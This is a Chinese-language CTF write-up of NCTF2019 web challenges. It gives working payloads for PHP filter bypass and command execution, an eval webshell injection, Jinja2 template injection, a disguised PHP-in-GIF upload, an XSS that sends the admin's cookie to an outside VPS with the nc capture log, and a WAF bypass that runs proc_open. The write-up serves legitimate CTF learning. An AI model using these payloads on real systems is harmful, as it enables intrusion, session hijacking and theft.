NJUPT2019南邮校赛

easyphp

<?php
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
$cmd = $_GET['q_w_q'];


//1st
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
    echo '1st ok'."<br>";
}
else{
    die('23333333');
}


//2nd
if(is_numeric($string_1)){
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);
    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'cxhp', '0123');
        $b = strtr($md5_2, 'cxhp', '0123');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}


//3rd
$query = $_SERVER['QUERY_STRING'];
if (strlen($cmd) > 8){
    die("too long :(");
}

if( substr_count($query, '_') === 0 && substr_count($query, '%5f') === 0 ){
    $arr = explode(' ', $cmd);
    if($arr[0] !== 'ls' || $arr[0] !== 'pwd'){
        if(substr_count($cmd, 'cat') === 0){
            system($cmd);
        }
        else{
            die('ban cat :) ');
        }
    }
    else{
        die('bad guy!');
    }
}
else{
    die('nonono _ is bad');
}
?>
23333333

第一层绕过直接在num后面加入\n

第二层绕过需要找一个是ce开头的，然后ce后面是纯数字的md5值，爆破了好久

第三层绕过把GET传入的变量名改成q+w+q即可，然后执行命令nl *.php

脚本如下

import requests
url = 'http://nctf2019.x1ct34m.com:60005/?num={num}&str1={str1}&str2={str2}&q+w+q=nl *.php'
num = '23333\n'

print(requests.get(url.format(num=num,str1='0507041381',str2='240610708')).text)

replace

POST /index.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40006
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://nctf2019.x1ct34m.com:40006/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Connection: close
Upgrade-Insecure-Requests: 1

sub=1234&pat=123&rep=eval($_POST[cmd])

然后菜刀连接即可

flask

可以执行

1	{{[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()}}

fuzz后过滤了flag字符串

1	{{[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('cat ../*').read()}}

Upload your Shell

上传页面为http://nctf2019.x1ct34m.com:60002/index.php?action=imgs.html

然后上传一个gif文件，内容为

1	GIF89a<script language="php">echo 123;</script>

然后就会得到提示

1	<h1>Success!</h1><h1>filepath:/var/www/html/upload-imgs/ce3d64bbda44d24bb25ad9bc0b24a621/Th1s_is_a_fl4g.jpg</h1>

访问http://nctf2019.x1ct34m.com:60002/index.php?action=/var/www/html/upload-imgs/ce3d64bbda44d24bb25ad9bc0b24a621/Th1s_is_a_fl4g.jpg即可得到flag

simple_xss

有公网vps，然后创建4.js，然后在vps上nc -vlp 10006

1 2	var image=new Image(); image.src="http://118.25.36.154:10006/cookies.phpcookie="+document.cookie;

post发送

POST /home.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://nctf2019.x1ct34m.com:40001/home.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Connection: close
Cookie: PHPSESSID=bj6lqis6j6ppsdjq6fv1oqm808; user=2195c28f04a206d7a8a37660d7ca25f5
Upgrade-Insecure-Requests: 1

to=admin&content=<script src=http://118.25.36.154/4.js></script>&insert=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

然后得到结果

Listening on [0.0.0.0] (family 0, port 10006)
Connection from [115.29.65.26] port 10006 [tcp/*] accepted (family 2, sport 43002)
GET /cookies.phpcookie=PHPSESSID=qm960h19dcds2h7guh1nk03qet;%20user=c6b93fa075336a55dc2ab6da03569e0b HTTP/1.1
Referer: http://139.129.76.65:40001/home.php
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: 118.25.36.154:10006

接下来只要替换cookie即可得到flag

GET /home.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qm960h19dcds2h7guh1nk03qet; user=c6b93fa075336a55dc2ab6da03569e0b
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Sun, 24 Nov 2019 12:43:19 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 26
Connection: close
Content-Type: text/html; charset=utf-8

NCTF{Th1s_is_a_Simple_xss}

hacker_backdoor

<?php
error_reporting(0);
if(!isset($_GET['code']) || !isset($_GET['useful'])){
    highlight_file(__file__);
}
$code = $_GET['code'];
$usrful = $_GET['useful'];

function waf($a){
    $dangerous = get_defined_functions();
    array_push($dangerous["internal"], 'eval', 'assert');
    foreach ($dangerous["internal"] as $bad) {
        if(strpos($a,$bad) !== FALSE){
            return False;
            break;
        }
    }
    return True;
}

if(file_exists($usrful)){
    if(waf($code)){
        eval($code);
    }
    else{
        die("oh,不能输入这些函数哦 :) ");
    }
}

这里可以使用拼接来完成，file_exists比较好绕过，先构造phpinfo()

$a='p'.'h'.'p'.'i'.'n'.'f'.'o';$a();


http://nctf2019.x1ct34m.com:60004/?useful=/etc&code=$a=%27p%27.%27h%27.%27p%27.%27i%27.%27n%27.%27f%27.%27o%27;$a();

查看disable_functions，发现了被禁用函数

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,system,shell_exec,popen,passthru,link,symlink,syslog,imap_open,ld,error_log,mail,assert,file_put_contents,scandir,file_get_contents,readfile,fread,fopen,chdir,unlink,delete

然后发现proc_open()没有被过滤，并且glob也没有被过滤，我们先读取/下的文件

$a='p'.'r'.'i'.'n'.'t'.'_'.'r';$s='g'.'l'.'o'.'b';$a($s('/*'));


http://nctf2019.x1ct34m.com:60004/?useful=/etc&code=$a=%27p%27.%27r%27.%27i%27.%27n%27.%27t%27.%27_%27.%27r%27;$s=%27g%27.%27l%27.%27o%27.%27b%27;$a($s(%27/*%27));

然后发现flag不能被直接读取，只能靠执行readflag进行读取，然后用proc_open()去执行readflag文件即可

$w='f'.'w'.'r'.'i'.'t'.'e';$c='f'.'c'.'l'.'o'.'s'.'e';$p='p'.'r'.'o'.'c'.'_'.'o'.'p'.'e'.'n';$pp='p'.'i'.'p'.'e';$s='s'.'t'.'r'.'e'.'a'.'m'.'_'.'g'.'e'.'t'.'_'.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s';$descriptorspec=[[$pp,"r"],[$pp,"w"]];$process=$p('sh', $descriptorspec,$d);$w($d[0],'/readflag');$c($d[0]);print($s($d[1]));$c($d[1]);


http://nctf2019.x1ct34m.com:60004/?useful=/etc&code=$w=%27f%27.%27w%27.%27r%27.%27i%27.%27t%27.%27e%27;$c=%27f%27.%27c%27.%27l%27.%27o%27.%27s%27.%27e%27;$p=%27p%27.%27r%27.%27o%27.%27c%27.%27_%27.%27o%27.%27p%27.%27e%27.%27n%27;$pp=%27p%27.%27i%27.%27p%27.%27e%27;$s=%27s%27.%27t%27.%27r%27.%27e%27.%27a%27.%27m%27.%27_%27.%27g%27.%27e%27.%27t%27.%27_%27.%27c%27.%27o%27.%27n%27.%27t%27.%27e%27.%27n%27.%27t%27.%27s%27;$descriptorspec=[[$pp,%22r%22],[$pp,%22w%22]];$process=$p(%27sh%27,%20$descriptorspec,$d);$w($d[0],%27/readflag%27);$c($d[0]);print($s($d[1]));$c($d[1]);